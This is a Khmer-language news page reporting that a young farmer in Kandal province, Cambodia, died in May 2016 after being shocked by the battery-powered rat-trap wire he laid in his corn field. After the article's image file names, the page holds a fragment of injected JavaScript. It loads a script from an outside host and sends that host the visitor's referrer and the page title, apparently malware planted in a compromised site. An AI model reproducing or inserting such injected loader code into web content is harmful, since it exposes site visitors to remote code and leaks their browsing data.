ព្រឹតិ្តការណ៍ថ្មីៗ

ទៀតហើយ! រាយខ្សែភ្លើងឆក់កណ្តុរបែរជាត្រូវឆក់ខ្លួនឯងស្លាប់ផ្កាប់មុខកណ្តាលវាលស្រែ

2 ឆ្នាំ មុន 1 តូ សុផល

ខេត្តកណ្តាល៖ នៅយប់ថ្ងៃទី២១ខែឧសភា ឆ្នាំ ២០១៦ វេលាម៉ោង០០.០៥នាទី រំលងអាធ្រាត្រ នៅចំណុច ភូមិភូមិខ្នាតាំងយូ ឃុំព្រែកជ្រៃ ស្រុកកោះធំ ខេត្តកណ្តាល ។


សមត្ថកិច្ចបានអោយដឹងថាជនរងគ្រោះ ឈ្មោះឡេ យ៊ាំងយ៉ាង ភេទប្រុស អាយុ២៤ឆ្នាំ ជនជាតិ វៀតណាម មុខរបរ កសិករ មានទីលំនៅៗភូមិឃុំ កើតហេតុខាងលើ ។  ក្នុងនោះដែរសមត្ថកិច្ចបានប្រមូលបានវត្ថុតាងមាន៖អាគុយ ០១ និងខ្សែលួសប្រវែង២០០ម៉ែត្រ។


ប្រភពដដែលបានអោយដឹងទៀតថា នៅវេលាម៉ោង៦ល្ងាចមិុញ ជនរងគ្រោះបានរាយខ្សែលួសដាក់ឆក់កណ្ដុរ នៅលើដីចំការពោតខាងក្រោយផ្ទះរបស់ខ្លួន រួចក៍មកដេកនៅផ្ទះវិញ លុះវេលាយប់ជ្រៅ ជនរងគ្រោះបានចេញទៅមើលខ្សែឆក់កណ្ដុរវិញមិនឃើញត្រឡប់មកវិញ។ លុះវេលាម៉ោង០០.០៥នាទីឆ្លងចូលថ្ងៃទី២២.០៥.២០១៦ ឪពុកក្មេកជនរងគ្រោះ ឈ្មោះ ប្រាក់ ហា បានភ្ញាក់ពីដេកមើលទៅដីចំការពោត ក៍ឃើញអំពូលភ្លើងអាគុយកន្លែងចាប់ខ្សែលួសឆក់កណ្ដុរមានសភាពភ្លឺក្រហមខ្លាំង ក៍សួរទៅកូនស្រីឈ្មោះហា វ៉ាន់ ត្រូវជាប្រពន្ធជនរងគ្រោះថាប្ដីឯងមានទៅមើលខ្សែឆក់ដែរ ឬអត់ ឈ្មោះហា វ៉ាន់ឆ្លើយថា ទៅមើលបាត់ហើយពេលឮ ដូចនេះ ឈ្មោះប្រាក់ ហា ក៍ដើរទៅដោះខ្សែលួសចេញពីក្បាលអាគុយរួចក៍មើលតាមខ្សែលួសដល់ចុងដីចំការ ក៍ឃើញជនរងគ្រោះ ដួលផ្កាប់មុខស្លាប់លើខ្សែលួសនិងមានស្នាមឆក់ខ្លោចលើភ្លៅ និងកំភួនជើង ក្រោយមកក្រុមគ្រួសារបានយកសាកសព និងអាគុយ យកមកផ្ទះ ឯដុំអាំងវិុចទ័រត្រូវ ឪពុកក្មេកជនរងគ្រោះបោះចូលក្នុងទឹកស្ទឹង ខ្នាតាំយូ បាត់រកពុំឃេីញ ទទួលបានព័ត៌នេះផ្នែកជំនាញ នៃអធិការរដ្ឋាននគរបាលស្រុកកោះធំ បានចុះទៅដល់កន្លែងកើតហេតុ បង្កើតគណៈកម្មការ មានអាជ្ញាធរមូលដ្ឋាន ប៉ុស្តិ៍នគរបាលរដ្ឋបាល គ្រូពេទ្យ នឹងផ្នែកជំនាញ ដេីម្បីធ្វើការពិនិត្យសាកសពជនរងគ្រោះ ឃើញថាជនរងគ្រោះ គឺពិតជាឆក់ចរន្តភ្លេីងអាគុយបណ្តាលឲ្យស្លាប់ដោយខ្លួនឯង ពិតប្រាកដមែន ។


បច្ចុប្បន្នសពត្រូវបានសមត្ថកិច្ចប្រគល់ជូនក្រុមគ្រួសារជនរងគ្រោះយកទៅធ្វើបុណ្យតាមប្រពៃណី ។

13233100_2034266383465038_8624966901652074566_n 13245301_2034266390131704_2306507954309600009_n 13256228_2034266406798369_2134633420693664964_n 13265909_2034266416798368_3682994625783774568_n 13265922_2034266370131706_9149415865231623641_n 13265989_2034266363465040_8968069154189150428_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ